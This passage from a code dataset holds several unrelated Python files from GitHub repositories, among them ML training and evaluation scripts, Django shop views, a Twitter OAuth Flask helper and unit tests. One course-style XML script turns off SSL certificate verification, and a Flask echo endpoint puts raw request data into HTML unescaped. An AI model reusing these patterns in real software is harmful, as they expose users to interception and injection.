'')\n )\n except Exception as e:\n log.exception(e)\n","repo_name":"blackfireio/python-sdk","sub_path":"hooks/flask/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":2539,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"7"} +{"seq_id":"72692805022","text":"import os\nos.environ['TDML_FRAMEWORK'] = 'pytorch'\nimport tdml\nimport unittest\nimport torch\n\nclass TestDataPyTorch(unittest.TestCase):\n\n\tdef test_data(self):\n\t\tarray = torch.tensor([[1,2,3,4], [5,6,7,8]])\n\t\tdata = tdml.Data(array)\n\n\t\tself.assertEqual(data.shape, (2, 4))\n\t\tself.assertEqual(data.num_sample, 2)\n\t\tself.assertEqual(str(data), \"Data(data=[2, 4])\")\n\n\t\treshuffle_indices = torch.tensor([1, 0])\n\t\treshuffle_array = torch.tensor([[5,6,7,8], [1,2,3,4]])\n\t\tdata.reshuffle(reshuffle_indices)\n\t\tself.assertTrue(torch.all(torch.eq(data.data, reshuffle_array)))\n\n\tdef test_feature(self):\n\t\tarray = torch.tensor([[1,2,3,4], [5,6,7,8]])\n\t\tfeature = tdml.Feature(array)\n\n\t\tself.assertEqual(feature.num_feature, 4)\n\n\tdef test_label(self):\n\t\tarray = torch.tensor([0,0,1,2,1,3,2,1,1,1,1,0])\n\t\tlabel = tdml.Label(array)\n\n\t\tself.assertEqual(label.num_label, 4)\n\nif __name__ == '__main__':\n\tunittest.main()","repo_name":"zechengz/tdml","sub_path":"tests/test_data/test_data_pytorch.py","file_name":"test_data_pytorch.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"30054521790","text":"from common import *\nfrom context_fm import CONTEXT_FM\nfrom W_B_manager import W_B_MANAGER\nfrom data_loader import DATA_LOADER\nfrom parser import load_pickle\nimport csv\nimport os\nimport tensorflow as tf\nimport numpy as np\n\nclass SUBMISSION:\n def __init__(self, file_path, is_val=False):\n self.csv = open(file_path, 'w')\n header = submission_header\n if is_val : \n header.insert(2, 'pick')\n header.insert(3, 'click')\n self.writer = csv.DictWriter(self.csv, fieldnames = header)\n\n self.writer.writeheader()\n \n def write(self, user_id, session_id, timestamp, step, item_reccomendations_list) :\n self.writer.writerow({'user_id' : user_id, 'session_id' : session_id, 'timestamp' : timestamp, 'step' : step, 'item_recommendations' : item_reccomendations_list})\n\n def write_is_val(self, user_id, session_id, timestamp, step, item_reccomendations_list, click, pick) :\n self.writer.writerow({'user_id' : user_id, 'session_id' : session_id, 'timestamp' : timestamp, 'step' : step, 'click' : click, 'item_recommendations' : item_reccomendations_list, 'pick' : pick})\n\n def close(self) :\n self.csv.close()\n\nif __name__ == \"__main__\" :\n W_user_id_path = '/hdd/sap/ml/final/data/WB/W_user_id_norm_pd_7810000.npy'\n B_user_id_path = '/hdd/sap/ml/final/data/WB/B_user_id_norm_pd_7810000.npy'\n W_item_id_path = '/hdd/sap/ml/final/data/WB/W_item_id_norm_pd_7810000.npy'\n B_item_id_path = '/hdd/sap/ml/final/data/WB/B_item_id_norm_pd_7810000.npy'\n #checkpoint_path=tf.train.latest_checkpoint(model_path)\n checkpoint_path=\"/hdd/sap/ml/final/model_norm_pd-7810000\"\n \n '''\n W_user_id_path = '/hdd/sap/ml/final/data/WB/W_user_id_norm_pd_400000.npy'\n B_user_id_path = '/hdd/sap/ml/final/data/WB/B_user_id_norm_pd_400000.npy'\n W_item_id_path = '/hdd/sap/ml/final/data/WB/W_item_id_norm_pd_400000.npy'\n B_item_id_path = '/hdd/sap/ml/final/data/WB/B_item_id_norm_pd_400000.npy'\n checkpoint_path=\"/hdd/sap/ml/final/model_norm_pd-400000\"\n '''\n \n os.environ[\"CUDA_VISIBLE_DEVICES\"]='0'\n w_dim =10 \n lr = 1\n batch_size = 1\n loss_type = 'TOP1'\n \n session_id_list = load_pickle(session_id_list_path)\n user_id_list = load_pickle(user_id_list_path)\n\n w_b_manager = W_B_MANAGER(W_user_id_path, B_user_id_path, W_item_id_path, B_item_id_path)\n W_B = w_b_manager.load()\n test_loader = DATA_LOADER(test_enc_path, enc_test_name, test_dic_path, item_property_binary_enc_path, batch_size, W_B, is_train=False)\n test_loader = DATA_LOADER(impression_enc_path, impression_enc_val_name, impression_dic_val_path, item_property_binary_enc_path, batch_size, W_B, is_train=False)\n sumission_csv_path = '/home/sapark/class/ml/final/submission/val_sub7.csv' \n #sumission_csv_path = '/home/sapark/class/ml/final/submission/sub7.csv' \n #submission = SUBMISSION(sumission_csv_path)\n submission = SUBMISSION(sumission_csv_path, is_val = True)\n fm = CONTEXT_FM(w_dim, lr, loss_type, item_size = 25)\n with tf.Session() as session:\n saver = tf.train.Saver()\n saver.restore(session, checkpoint_path) \n for i in range(test_loader.impression_dic_size) :\n filter_idx, platform_idx, device_idx, W_user_id, B_user_id, price, dp_order, interaction, W_item_id, B_item_id, item_property_binary, _, _, _, _, impressions = test_loader.get_batch()\n price_mean = np.mean(price)\n price_std = max(np.std(price), 1)\n price = - ( (price - price_mean) / price_std )\n interaction = interaction > 0\n item_property_binary = item_property_binary / np.clip(np.sum(item_property_binary), 1, 10000)\n filter_idx = filter_idx / np.clip(np.sum(filter_idx), 1, 10000)\n\n impressions = impressions.split('|')\n feed_dict_test = {fm.filter_idx : filter_idx, \\\n fm.platform_idx : platform_idx,\\\n fm.device_idx : device_idx,\\\n fm.interaction : interaction,\\\n fm.price : price,\\\n fm.order : dp_order,\\\n fm.W_user_id_ph : W_user_id,\\\n fm.W_item_id_ph : W_item_id,\\\n fm.B_user_id_ph : B_user_id,\\\n fm.B_item_id_ph : B_item_id,\\\n fm.item_property_binary : item_property_binary,\\\n fm.impression : impressions\\\n }\n\n cur_recip_rank = session.run(fm.prediction, feed_dict=feed_dict_test)\n cur_recip_rank = cur_recip_rank.astype('U13').tolist()\n space_sep_rank = ' '.join(cur_recip_rank)\n user_id = user_id_list[test_loader.cur_dic[\"user_id_idx\"]]\n session_id = session_id_list[test_loader.cur_dic[\"session_id_idx\"]]\n timestamp = test_loader.cur_dic[\"timestamp\"]\n step = test_loader.cur_dic[\"step\"]\n click = impressions[test_loader.cur_dic[\"click\"]] if test_loader.cur_dic[\"click\"] != -1 else -1\n pick = cur_recip_rank.index(click) + 1 if click != -1 else -1\n #submission.write(user_id, session_id, timestamp, step, space_sep_rank)\n submission.write_is_val(user_id, session_id, timestamp, step, space_sep_rank, click, pick)\n \n if (i %1000 == 0):\n print(i+1 , '/', test_loader.impression_dic_size, 'Done')\n\n submission.close()\n","repo_name":"solapark/fm","sub_path":"submission.py","file_name":"submission.py","file_ext":"py","file_size_in_byte":5366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"835155368","text":"import json\nfrom datetime import datetime, timedelta\n\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.messages.storage import session\nfrom django.http import JsonResponse, HttpResponse\nfrom django.shortcuts import render\n\n# Create your views here.\nfrom django.utils.translation import gettext\n\nfrom customer.models import Customer\nfrom order.models import Order, OrderItem, ShippingAddress\nfrom store.models import Product, Discount\n\n\n# this is a function that just return cart of customer that logged in.\ndef cart(request):\n return render(request, 'order/cart.html')\n\n\n# this is a function for update order & orderItem of customer\n@login_required\ndef updateItem(request):\n if request.method == 'POST':\n data = json.loads(request.body)\n product_id = data['productId']\n quantity = data['quantity']\n customer = Customer.objects.get(user=request.user)\n product = Product.objects.get(id=product_id)\n try:\n order = Order.objects.get(customer=customer, complete=False)\n except Order.DoesNotExist:\n order = Order(customer=customer, complete=False)\n order.save()\n\n try:\n order_item = OrderItem.objects.get(order=order, product=product)\n except OrderItem.DoesNotExist:\n order_item = OrderItem(order=order, product=product)\n\n order_item.quantity = quantity\n\n order_item.save()\n\n if order_item.quantity <= 0:\n order_item.delete()\n\n return JsonResponse('Item was added', safe=False)\n\n\n# this is for checkout the order for customer and complete the order\n@login_required\ndef checkout(request):\n if request.method == 'POST':\n data = json.loads(request.body)\n address_id = data['address_id']\n discount_code = data['discount']\n customer = Customer.objects.get(user=request.user)\n order = Order.objects.get(customer=customer, complete=False)\n user_address = ShippingAddress.objects.get(id=address_id)\n order.shipping_address = user_address\n order.complete = True\n order.save()\n user_order_items = order.orderItems.all()\n for orderItem in user_order_items:\n product = orderItem.product\n product.stock -= orderItem.quantity\n product.save()\n if discount_code != '':\n customer.discount_code = None\n customer.save()\n return JsonResponse('True', safe=False)\n customer = Customer.objects.get(user=request.user)\n addresses = ShippingAddress.objects.filter(customer=customer)\n return render(request, 'order/checkout.html', context={'addresses': addresses})\n\n\n# this function return history of orders for 10 days ago\n# orders must be completed.\n@login_required\ndef orderHistory(request):\n login_user = request.user\n customer = Customer.objects.get(user=login_user)\n t = timedelta(days=10)\n ten_days_ago = datetime.now() - t\n available_orders = Order.objects.filter(customer=customer, date_ordered__range=[ten_days_ago, datetime.now()],\n complete=True)\n return render(request, 'order/order_history.html', context={\n 'available_orders': available_orders\n })\n\n\n@login_required\ndef checkDiscount(request, code):\n customer = Customer.objects.get(user=request.user)\n try:\n discount = Discount.objects.get(code=code)\n if customer.discount_code != discount:\n return JsonResponse({'error': gettext('Wrong code !!!')})\n if not discount.state:\n return JsonResponse({'error': gettext('This code has been expired !!!')})\n else:\n return JsonResponse({'amount': discount.amount})\n except:\n return JsonResponse({'error': gettext('Wrong code !!!')})\n","repo_name":"abolfazlj00/Ecommerce_djangoProject","sub_path":"order/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"24586456511","text":"class RK4(object):\n def __init__(self, *functions):\n self.f = functions\n self.t = 0\n\n def solve(self, y, h, n):\n t = []\n res = []\n for i in y:\n res.append([])\n\n while self.t <= n and h != 0:\n t.append(self.t)\n y = self._solve(y, self.t, h)\n for c, i in enumerate(y):\n res[c].append(i)\n\n self.t += h\n\n if self.t + h > n:\n h = n - self.t\n\n return t, res\n\n\n def _solve(self, y, t, h):\n k1 = []\n k2 = []\n k3 = []\n k4 = []\n for f in self.f:\n k1.append(h * f(t, *y))\n k2.append(h * f(t + .5*h, *[y[i] + .5*h*k1[i] for i in range(0, len(y))]))\n k3.append(h * f(t + .5*h, *[y[i] + .5*h*k2[i] for i in range(0, len(y))]))\n k4.append(h * f(t + h, *[y[i] + h*k3[i] for i in range(0, len(y))]))\n\n return [y[i] + (k1[i] + 2*k2[i] + 2*k3[i] + k4[i]) / 6.0 for i in range(0, len(y))]","repo_name":"catbrower/network_project","sub_path":"RungeKutta.py","file_name":"RungeKutta.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"9891201705","text":"# coding: utf-8\n\"\"\"\nAdd object_name column to object_publications table.\n\"\"\"\n\nimport os\n\nimport flask_sqlalchemy\n\nfrom .utils import table_has_column\n\nMIGRATION_INDEX = 27\nMIGRATION_NAME, _ = os.path.splitext(os.path.basename(__file__))\n\n\ndef run(db: flask_sqlalchemy.SQLAlchemy) -> bool:\n # Skip migration by condition\n if table_has_column('object_publications', 'object_name'):\n return False\n\n # Perform migration\n db.session.execute(db.text(\"\"\"\n ALTER TABLE object_publications\n ADD object_name TEXT NULL\n \"\"\"))\n return True\n","repo_name":"sciapp/sampledb","sub_path":"sampledb/models/migrations/publications_add_object_name.py","file_name":"publications_add_object_name.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"7"} +{"seq_id":"21844410450","text":"import urllib.request, urllib.parse, urllib.error\nimport xml.etree.ElementTree as ET\nimport ssl\n\n# Ignore SSL certificate errors\nctx = ssl.create_default_context()\nctx.check_hostname = False\nctx.verify_mode = ssl.CERT_NONE\n\ncount = 0\nlista = list()\n\nurl = input('Enter -')\nuh = urllib.request.urlopen(url, context=ctx)\n\ndata = uh.read()\ntree = ET.fromstring(data)\n\ntags = tree.findall('comments/comment')\n#print(\"count\",len(tree.findall('comments/comment')))\nfor elem in tags:\n tag = elem.find('count').text\n #print(\"tag:\",tag)\n\n nums = int(tag)\n #lista.append(nums)\n count += nums\n \nprint(\"Este es el resultado:\",count)\n\n\n\n#results = tree.findall('result')\n#contar = tree.find('count').text\n#print(\"contar\",contar)\n#lng = results[0].find('geometry').find('location').find('lng').text\n#location = results[0].find('formatted_address').text\n\n#print('contar', contar)\n#print(location)","repo_name":"Cande8a/Python","sub_path":"ej tarea XML.py","file_name":"ej tarea XML.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"74118221023","text":"from flask import Flask, request\n\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef echo():\n return (\n f'METHOD:
{request.method}

'\n f'HEADERS:
{request.headers}

'\n f'BODY:
{request.data.decode()}

'\n )\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0')\n","repo_name":"jli488/Notes-Expert-Python","sub_path":"Chapter-02/app/echo.py","file_name":"echo.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"42182185033","text":"import json\nfrom flask import Flask, request, redirect\nimport multiprocessing\nfrom threading import Timer\n\nimport twitter\nfrom twitter.oauth_dance import parse_oauth_tokens\nfrom twitter.oauth import read_token_file, write_token_file\n\n\n# XXX: Go to http://twitter.com/apps/new to create an app and get values\n# for these credentials that you'll need to provide in place of these\n# empty string values that are defined as placeholders.\n# See https://dev.twitter.com/docs/auth/oauth for more information \n# on Twitter's OAuth implementation, and ensure that *oauth_callback*\n# is defined in your application settings as shown next if you are \n# using Flask in this IPython Notebook.\n\n# Define a few variables that will bleed into the lexical scope of a couple of \n# functions that follow\n# CONSUMER_KEY = ''\n# CONSUMER_SECRET = ''\n\nimport configparser\n\nconfig = configparser.ConfigParser()\n\n# CAUTION: These files contain secrets that can grant access to anyone that can read them.\n# Better way to manage passwords/Keys?!?!? TODO\nOAUTH_FILE = \"resources/ch09-twittercookbook/twitter_oauth\"\nconfig.read_file(open(r'./../twitter_keys'))\n\n\nCONSUMER_KEY = config.get('T Section', 'CONSUMER_KEY')\nCONSUMER_SECRET = config.get('T Section', 'CONSUMER_SECRET')\n\n\noauth_callback = 'http://127.0.0.1:5000/oauth_helper'\n \n# Set up a callback handler for when Twitter redirects back to us after the user \n# authorizes the app\n\nwebserver = Flask(\"TwitterOAuth\")\n@webserver.route(\"/oauth_helper\")\ndef oauth_helper():\n \n oauth_verifier = request.args.get('oauth_verifier')\n\n # Pick back up credentials from ipynb_oauth_dance\n oauth_token, oauth_token_secret = read_token_file(OAUTH_FILE)\n \n _twitter = twitter.Twitter(\n auth=twitter.OAuth(\n oauth_token, oauth_token_secret, CONSUMER_KEY, CONSUMER_SECRET),\n format='', api_version=None)\n \n oauth_token, oauth_token_secret = parse_oauth_tokens(\n _twitter.oauth.access_token(oauth_verifier=oauth_verifier, oauth_token=oauth_token, oauth_consumer_key=CONSUMER_KEY))\n\n # Write out the final credentials that can be picked up after the following\n write_token_file(OAUTH_FILE, oauth_token, oauth_token_secret)\n return \"%s %s written to %s\" % (oauth_token, oauth_token_secret, OAUTH_FILE)\n\n# To handle Twitter's OAuth 1.0a implementation, we'll just need to implement a \n# custom \"oauth dance\" and will closely follow the pattern defined in \n# twitter.oauth_dance.\n\n@webserver.route(\"/oauth_dance\")\ndef oauth_dance():\n \n _twitter = twitter.Twitter(\n auth=twitter.OAuth('', '', CONSUMER_KEY, CONSUMER_SECRET),\n format='', api_version=None)\n\n oauth_token, oauth_token_secret = parse_oauth_tokens(\n _twitter.oauth.request_token(oauth_callback=oauth_callback))\n\n print(oauth_token, oauth_token_secret, \"token and secret from twitter\")\n # Need to write these interim values out to a file to pick up on the callback \n # from Twitter that is handled by the web server in /oauth_helper\n write_token_file(OAUTH_FILE, oauth_token, oauth_token_secret)\n \n oauth_url = ('https://api.twitter.com/oauth/authorize?oauth_token=' + oauth_token)\n \n # Redirect to twitter URL for user authorization.\n return redirect(oauth_url, code=302)\n\n\n@webserver.route(\"/trends//\")\ndef trends(woe_id):\n \n oauth_token, oauth_token_secret = read_token_file(OAUTH_FILE)\n \n auth = twitter.oauth.OAuth(oauth_token, oauth_token_secret,\n CONSUMER_KEY, CONSUMER_SECRET)\n \n twitter_api = twitter.Twitter(auth=auth)\n \n trends = twitter_api.trends.place(_id=woe_id)\n# print(json.dumps(trends, indent=1))\n\n return json.dumps(trends, indent=1)\n\n\n\nwebserver.run(host='0.0.0.0')\n\n","repo_name":"dteklavya/Mining-the-Social-Web-2nd-Edition","sub_path":"ipynb/twitter_oauth.py","file_name":"twitter_oauth.py","file_ext":"py","file_size_in_byte":3769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"13160751505","text":"# -*- coding: utf-8 -*-\n\nimport optimisation_class_no_plots_128 as optim\nimport inv_prob_class as IP\nimport knees2_128_128_vae_test as vae\nimport tensorflow as tf\nimport numpy as np\ntest_images = np.load('./datasets/knee_fastMRI_test_128_cleaned.npy')\n\n\ntf.reset_default_graph()\nsess = tf.InteractiveSession()\n\n# Import the VAE model and load from a checkpoint\ncheckpoint_file = 'USER DEFINED PATH'\nmodel = vae.kneesVAE(800, checkpoint_file, sess)\n\n# Set up the inverse problem\ninv_prob = IP.invProb(model, 'tomography')\naim = test_images[253]\n\n# Create noisy observed data\nnp.random.seed(9)\ninv_prob.observe_data(aim, noise_level=0.02)\nnp.save('aim_knees_test_cleaned_253.npy', inv_prob.aim)\nnp.save('data_knees_tomography_test_cleaned_253_0.02_noise.npy', inv_prob.data)\n\n\n#Load the optimisation class \nopt = optim.optimisation(inv_prob, model)\n\n#Test the 4 different optimisation methods \nplot = opt.gd_z_regularisation_parameter(initial_z=np.random.normal(\n 0, 1, (4, opt.n_latent)), iteration_number=200, save_name='VAE2_128_128_800_0.001_z_optimisation_knees_test_cleaned_253_no_sig', save=True)\nplot = opt.optim_z_sparse_regularisation_parameter(initial_z=np.random.normal(0, 1, (4, opt.n_latent)), initial_u=np.zeros(\n (4, 128, 128)), iteration_number=200, save_name='VAE2_128_128_800_0.001_z_sparse_knees_test_cleaned_253_no_sig_', early_stop=False, save=True)\nplot = opt.optim_x_soft_constraints_regularisation_parameter(initial_z=np.random.normal(0, 1, (4, opt.n_latent)), initial_x=np.random.normal(\n 0, 1, (4, 128, 128)), iteration_number=200, save_name='VAE2_128_128_800_0.001_x_soft_knees_test_cleaned_253_no_sig_', early_stop=False, save=True)\nplot = opt.optim_x_tik_regularisation_parameter(\n iteration_number=3000, save_name='x_tik_knees_test_cleaned_253_no_sig', save=True, early_stop=False)\n\n#\n#\n","repo_name":"MargaretDuff/Regularising-Inverse-Problems-with-Generative-Machine-Learning-Models","sub_path":"knees/run_reconstructions.py","file_name":"run_reconstructions.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"1580774945","text":"import argparse\nimport os\nimport warnings\n\nimport mmcv\nimport torch\nfrom mmcv import Config, DictAction\nfrom mmcv.cnn import fuse_conv_bn\nfrom mmcv.parallel import MMDataParallel, MMDistributedDataParallel\nfrom mmcv.runner import (get_dist_info, init_dist, load_checkpoint,\n wrap_fp16_model)\nfrom mmdet.apis import multi_gpu_test\n\nfrom mmocr.apis.test import single_gpu_test\nfrom mmocr.apis.utils import (disable_text_recog_aug_test,\n replace_image_to_tensor)\nfrom mmocr.datasets import build_dataloader, build_dataset\nfrom mmocr.models import build_detector\nfrom mmocr.utils import revert_sync_batchnorm, setup_multi_processes\n\n\ndef parse_args():\n # 已看過,驗證模式下的參數配置\n parser = argparse.ArgumentParser(\n description='MMOCR test (and eval) a model.')\n # 選取config文件\n parser.add_argument('config', help='Test config file path.')\n # 設定訓練完成的模型權重檔案位置\n parser.add_argument('checkpoint', help='Checkpoint file.')\n # 輸出結果的檔案位置,需要是pickle格式\n parser.add_argument('--out', help='Output result file in pickle format.')\n # 是否需要將conv與bn進行融合,透過融合可以加速模型訓練,因為權重不會再改變所以可以透過數學將兩層合併為一層\n parser.add_argument(\n '--fuse-conv-bn',\n action='store_true',\n help='Whether to fuse conv and bn, this will slightly increase'\n 'the inference speed.')\n # 要使用的gpu的id\n parser.add_argument(\n '--gpu-id',\n type=int,\n default=0,\n help='id of gpu to use '\n '(only applicable to non-distributed testing)')\n # 是否需要將輸出資料格式化\n parser.add_argument(\n '--format-only',\n action='store_true',\n help='Format the output results without performing evaluation. It is'\n 'useful when you want to format the results to a specific format and '\n 'submit them to the test server.')\n # 驗證指標,如果是文字區域檢測可以使用hmean-iou\n parser.add_argument(\n '--eval',\n type=str,\n nargs='+',\n help='The evaluation metrics. Options: \\'hmean-ic13\\', \\'hmean-iou'\n '\\' for text detection tasks, \\'acc\\' for text recognition tasks, and '\n '\\'macro-f1\\' for key information extraction tasks.')\n # 是否需要展示預測結果\n parser.add_argument('--show', action='store_true', help='Show results.')\n # 將預測結果保存在哪裡\n parser.add_argument(\n '--show-dir', help='Directory where the output images will be saved.')\n # 閾值,當預測值小於閾值的會被忽略掉,預設為0.3\n parser.add_argument(\n '--show-score-thr',\n type=float,\n default=0.3,\n help='Score threshold (default: 0.3).')\n # 是否要使用gpu收集results\n parser.add_argument(\n '--gpu-collect',\n action='store_true',\n help='Whether to use gpu to collect results.')\n # 暫存檔案位置,用來搜集從多線程預測出的結果\n parser.add_argument(\n '--tmpdir',\n help='The tmp directory used for collecting results from multiple '\n 'workers, available when gpu-collect is not specified.')\n # 其他額外添加的config\n parser.add_argument(\n '--cfg-options',\n nargs='+',\n action=DictAction,\n help='Override some settings in the used config, the key-value pair '\n 'in xxx=yyy format will be merged into the config file. If the value '\n 'to be overwritten is a list, it should be of the form of either '\n 'key=\"[a,b]\" or key=a,b. The argument also allows nested list/tuple '\n 'values, e.g. key=\"[(a,b),(c,d)]\". Note that the quotation marks '\n 'are necessary and that no white space is allowed.')\n parser.add_argument(\n '--options',\n nargs='+',\n action=DictAction,\n help='Custom options for evaluation, the key-value pair in xxx=yyy '\n 'format will be kwargs for dataset.evaluate() function (deprecate), '\n 'change to --eval-options instead.')\n parser.add_argument(\n '--eval-options',\n nargs='+',\n action=DictAction,\n help='Custom options for evaluation, the key-value pair in xxx=yyy '\n 'format will be kwargs for dataset.evaluate() function.')\n parser.add_argument(\n '--launcher',\n choices=['none', 'pytorch', 'slurm', 'mpi'],\n default='none',\n help='Options for job launcher.')\n # 多gpu相關資料\n parser.add_argument('--local_rank', type=int, default=0)\n args = parser.parse_args()\n if 'LOCAL_RANK' not in os.environ:\n os.environ['LOCAL_RANK'] = str(args.local_rank)\n\n if args.options and args.eval_options:\n raise ValueError(\n '--options and --eval-options cannot be both '\n 'specified, --options is deprecated in favor of --eval-options.')\n if args.options:\n warnings.warn('--options is deprecated in favor of --eval-options.')\n args.eval_options = args.options\n # 將args資料回傳\n return args\n\n\ndef main():\n # 已看過,獲取設定資料\n args = parse_args()\n\n # 以下幾種驗證內容至少需要選擇一個否則驗證是沒有作用的\n assert (\n args.out or args.eval or args.format_only or args.show\n or args.show_dir), (\n 'Please specify at least one operation (save/eval/format/show the '\n 'results / save the results) with the argument \"--out\", \"--eval\"'\n ', \"--format-only\", \"--show\" or \"--show-dir\".')\n\n if args.eval and args.format_only:\n # eval與format_only只能兩個選一個使用\n raise ValueError('--eval and --format_only cannot be both specified.')\n\n if args.out is not None and not args.out.endswith(('.pkl', '.pickle')):\n # 如果有設定out參數則out檔案需要是以pkl或是pickle為副檔名\n raise ValueError('The output file must be a pkl file.')\n\n # 讀取config文件當中內容\n cfg = Config.fromfile(args.config)\n if args.cfg_options is not None:\n # 如果有需要特別添加額外config內容就會在這裡進行加入\n cfg.merge_from_dict(args.cfg_options)\n # 設定多線程驗證的內容\n setup_multi_processes(cfg)\n\n # set cudnn_benchmark,開啟後可以增加模型推理速度\n if cfg.get('cudnn_benchmark', False):\n torch.backends.cudnn.benchmark = True\n # 如果在config文件當中backbone有需要載入預訓練權重會先進行關閉,因為會載入整個模型的權重\n if cfg.model.get('pretrained'):\n cfg.model.pretrained = None\n # 處理neck模塊的預訓練權重,將其設定成None\n if cfg.model.get('neck'):\n if isinstance(cfg.model.neck, list):\n for neck_cfg in cfg.model.neck:\n if neck_cfg.get('rfp_backbone'):\n if neck_cfg.rfp_backbone.get('pretrained'):\n neck_cfg.rfp_backbone.pretrained = None\n elif cfg.model.neck.get('rfp_backbone'):\n if cfg.model.neck.rfp_backbone.get('pretrained'):\n cfg.model.neck.rfp_backbone.pretrained = None\n\n # in case the test dataset is concatenated,獲取一個gpu的batch_size\n samples_per_gpu = (cfg.data.get('test_dataloader', {})).get(\n 'samples_per_gpu', cfg.data.get('samples_per_gpu', 1))\n if samples_per_gpu > 1:\n # 多gpu相關設定\n cfg = disable_text_recog_aug_test(cfg)\n cfg = replace_image_to_tensor(cfg)\n\n # init distributed env first, since logger depends on the dist info.\n if args.launcher == 'none':\n cfg.gpu_ids = [args.gpu_id]\n distributed = False\n else:\n distributed = True\n init_dist(args.launcher, **cfg.dist_params)\n\n # build the dataloader\n # 構建驗證使用的dataset\n dataset = build_dataset(cfg.data.test, dict(test_mode=True))\n # step 1: give default values and override (if exist) from cfg.data\n # 構建基本DataLoader配置參數\n default_loader_cfg = {\n # 設定種子碼以及是否將最後部分去除以及分布式訓練資訊\n **dict(seed=cfg.get('seed'), drop_last=False, dist=distributed),\n **({} if torch.__version__ != 'parrots' else dict(\n prefetch_num=2,\n pin_memory=False,\n ))\n }\n # 其他config參數載入進去\n default_loader_cfg.update({\n k: v\n for k, v in cfg.data.items() if k not in [\n 'train', 'val', 'test', 'train_dataloader', 'val_dataloader',\n 'test_dataloader'\n ]\n })\n # 最終創建DataLoader參數\n test_loader_cfg = {\n **default_loader_cfg,\n **dict(shuffle=False, drop_last=False),\n **cfg.data.get('test_dataloader', {}),\n **dict(samples_per_gpu=samples_per_gpu)\n }\n\n # 構建DataLoader\n data_loader = build_dataloader(dataset, **test_loader_cfg)\n\n # build the model and load checkpoint\n cfg.model.train_cfg = None\n # 構建模型實例對象\n model = build_detector(cfg.model, test_cfg=cfg.get('test_cfg'))\n # 將模型當中所有的syncBN轉成BN\n model = revert_sync_batchnorm(model)\n fp16_cfg = cfg.get('fp16', None)\n if fp16_cfg is not None:\n wrap_fp16_model(model)\n # 載入訓練好的模型權重\n load_checkpoint(model, args.checkpoint, map_location='cpu')\n if args.fuse_conv_bn:\n model = fuse_conv_bn(model)\n\n if not distributed:\n # 如果不是使用分布式驗證就會到這裡\n model = MMDataParallel(model, device_ids=cfg.gpu_ids)\n is_kie = cfg.model.type in ['SDMGR']\n # 進行單gpu或是cup的驗證\n outputs = single_gpu_test(model, data_loader, args.show, args.show_dir,\n is_kie, args.show_score_thr)\n else:\n model = MMDistributedDataParallel(\n model.cuda(),\n device_ids=[torch.cuda.current_device()],\n broadcast_buffers=False)\n outputs = multi_gpu_test(model, data_loader, args.tmpdir,\n args.gpu_collect)\n\n rank, _ = get_dist_info()\n if rank == 0:\n if args.out:\n print(f'\\nwriting results to {args.out}')\n mmcv.dump(outputs, args.out)\n kwargs = {} if args.eval_options is None else args.eval_options\n if args.format_only:\n dataset.format_results(outputs, **kwargs)\n if args.eval:\n eval_kwargs = cfg.get('evaluation', {}).copy()\n # hard-code way to remove EvalHook args\n for key in [\n 'interval', 'tmpdir', 'start', 'gpu_collect', 'save_best',\n 'rule'\n ]:\n eval_kwargs.pop(key, None)\n eval_kwargs.update(dict(metric=args.eval, **kwargs))\n print(dataset.evaluate(outputs, **eval_kwargs))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"chris901003/DeepLearning","sub_path":"mmocr/tools/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":11024,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"7"} +{"seq_id":"22036016403","text":"\"\"\" This module provides basic management of models of the NLP engine \"\"\"\n\nfrom pathlib import Path\n\nimport spacy\nfrom spacy.language import Language\nfrom spacy.tokens import Doc\n\nfrom .classifiers import IntentClassifier\n\n\nclass ModelManager(object):\n \"\"\"Manipulate the NLP engine and models\"\"\"\n def __init__(self, model_path, create_on_404=False, default_model=\"en_core_web_sm\"):\n \"\"\"\n Initialzes the model\n Parameters:\n model_path (str): the path to the model\n --optional\n create_on_404 (bool): wether to create a new model in case the model wasn't found. Default is False\n default_model (str): the default model to use in case a new model is created. Default is 'en_core_web-sm'. Refer to spacy models for this\n If the model was not found and create_on_404 is False, it will raise a ModuleNotFoundError.\n If the default_model is overwritten, a possible exception in case the model wan't found by spacy is not handled.\n \"\"\"\n self.model_path = model_path\n # add the IntentClassifier to language factories\n Language.factories['intent_classifier'] = lambda model, **cfg: IntentClassifier(model, **cfg)\n \n if self.__model_exists ():\n self.model = spacy.load(self.model_path)\n else:\n if create_on_404: \n self.model = spacy.load(default_model)\n else:\n raise ModuleNotFoundError(\"The NLP model not found!\")\n # add the intent attribute to the doc\n Doc.set_extension(\"intent\", default=None, force=True)\n # add the intent classifier to the pipeline if not present\n if \"intent_classifier\" not in self.model.pipe_names:\n self.model.add_pipe(IntentClassifier)\n\n def __model_exists(self, dir_name=None):\n \"\"\"\n check if the directory name exists then return the result\n by defaults check for the actual model. \n Parameters:\n dir_name (str): path to the model to check. Its optional and default is None\n Returns bool\n \"\"\"\n if dir_name != None: \n path = Path(dir_name)\n else:\n path = Path(self.model_path)\n if 